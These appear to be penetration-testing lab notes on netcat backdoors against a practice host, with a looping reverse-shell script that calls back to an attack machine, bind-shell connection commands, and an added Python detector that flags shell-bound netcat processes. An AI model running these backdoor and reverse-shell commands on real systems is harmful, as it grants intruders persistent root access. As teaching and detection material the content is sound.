Shells and Reverse Shells

Netcat Shell

To use netcat as a backdoor, we need a way to direct all communication that arrives through netcat into a shell or command prompt.

Nmap scan against Hackerdemia => nmap 192.168.1.123

The port we will look at is port 1337

When a connection is made, netcat executes the bash shell, allowing us to interact with the system.

Permissions are transferred whenever a process is launched.

The bash shell inherits the permissions of whoever started the netcat process => here, the system itself (via the startup script).

nc 192.168.1.123 1337

Backdoor connection

whoami => root

pwd => /

ifconfig => eth0, lo ...

uname -a => Linux slax 2.6.16

We now have a backdoor that will be accessible as long as the startup script is running.
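The point above about inherited permissions is also what a defender looks for: a netcat process whose socket is handed to a shell runs with the privileges of whoever started it, and when that is a startup script, the shell is root. The following is an added example, not code from the original notes; it reads a constructed ps listing (not captured from a real system) and reports each shell-bound netcat process, whether it is waiting for inbound connections or dialling out, and the account it runs as. Binary names, flag names and the sample rows are assumptions made for the example.

```python
"""Added example (not from the original notes): list netcat processes that hand
their socket to a shell, and report the account each one runs as, since the
shell inherits that account's privileges.

The input is a constructed ``ps -eo user,pid,ppid,args`` listing embedded below
so the script runs offline; on a live host, feed it the real listing instead."""
import shlex

# Constructed sample listing (not captured from a real system).
SAMPLE_PS = """\
USER       PID  PPID COMMAND
root         1     0 /sbin/init
root       842     1 /bin/sh /etc/rc.d/rc.local
root       857   842 nc -l -p 1337 -e /bin/bash
www-data  1203  1190 /usr/sbin/apache2 -k start
bob       1440  1399 nc -zv 192.168.1.5 80
bob       1455  1399 /bin/sh ./reconnect.sh
bob       1461  1455 nc 192.168.1.10 1337 -e /bin/sh
alice     1500  1488 ncat --exec /bin/sh -l 4444
"""

# Common netcat binary names and the flags that bind a program to the socket
# (assumed set for this example; extend it for the builds on your hosts).
NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
SHELL_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}
PRIVILEGED = {"root"}


def parse_ps(text):
    """Yield one dict per process line of a ``ps -eo user,pid,ppid,args`` listing."""
    for line in text.splitlines()[1:]:          # skip the header row
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        user, pid, ppid, args = parts
        yield {"user": user, "pid": int(pid), "ppid": int(ppid), "args": args}


def bound_program(argv):
    """Return the program a netcat argv hands its socket to, or None."""
    for i in range(1, len(argv)):
        tok = argv[i]
        if tok in SHELL_FLAGS and i + 1 < len(argv):
            return argv[i + 1]
        if tok.startswith("--exec=") or tok.startswith("--sh-exec="):
            return tok.split("=", 1)[1]
    return None


def classify(proc):
    """Return a finding for a shell-bound netcat process, else None.
    Limitation: combined short flags such as ``-lp`` are not expanded."""
    try:
        argv = shlex.split(proc["args"])
    except ValueError:
        argv = proc["args"].split()
    if not argv or argv[0].rsplit("/", 1)[-1] not in NETCAT_NAMES:
        return None
    program = bound_program(argv)
    if program is None:
        return None
    # -l: waiting for inbound connections (bind shell); otherwise it dials out
    # (reverse shell) and the parent is often the loop script that restarts it.
    listening = "-l" in argv or "--listen" in argv
    return {
        "pid": proc["pid"],
        "ppid": proc["ppid"],
        "user": proc["user"],
        "kind": "bind" if listening else "reverse",
        "program": program,
        "privileged": proc["user"] in PRIVILEGED,
    }


def find_shell_bound_netcat(ps_text):
    """All findings for a ps listing, in process order."""
    return [f for f in map(classify, parse_ps(ps_text)) if f is not None]


if __name__ == "__main__":
    for f in find_shell_bound_netcat(SAMPLE_PS):
        flag = "PRIVILEGED " if f["privileged"] else ""
        print(f"{flag}{f['kind']} shell: pid {f['pid']} (parent {f['ppid']}) "
              f"runs {f['program']} as {f['user']}")
```

The parent PID is reported deliberately: killing the netcat process alone is not enough when the parent is a loop or startup script that relaunches it, so the finding points at what actually has to be removed.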

Netcat Reverse Shell

A reverse shell, where the target connects out to us, will often get past firewalls that block inbound connections but allow outbound ones, so they do not sever our connection.

Reverse shell using netcat.

#!/bin/sh
# Reconnect to the attack system forever, handing each connection to /bin/sh,
# so the shell comes back whenever the connection is dropped.
while true; do
    nc 192.168.1.10 1337 -e /bin/sh
done

Listener on the attack system (192.168.1.10) => nc -l -p 1337

Because we are root on the attack system, it does not matter which port we listen on: root can bind privileged ports as well.

Everything we send to the target system will be in cleartext => netcat does not encrypt the communication stream, so anyone monitoring the network can read it.

If we create a backdoor during a penetration test, we need to be able to remove it later (the startup script and the running process, not just the open connection).
